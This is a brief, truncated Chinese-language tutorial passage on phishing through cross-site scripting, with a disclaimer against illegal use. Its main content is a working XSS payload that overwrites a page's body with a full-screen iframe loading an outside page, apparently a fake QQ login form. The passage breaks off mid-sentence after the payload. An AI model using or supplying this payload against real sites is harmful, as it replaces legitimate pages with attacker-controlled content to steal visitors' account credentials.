文章内容比较简单，但可以造成不可想象的后果，禁止用于非法钓鱼，否则，后果自负。 1，讲到钓鱼，先得有xss的地方 xss代码如下 top.document.body.innerHTML="<iframe width=100% height=100% frameborder=0 scrolling=no style=position:absolute;left:0;top:0 src=http://xj.hk/qq.php?qqnum=10010></iframe>"; 其中top.docum…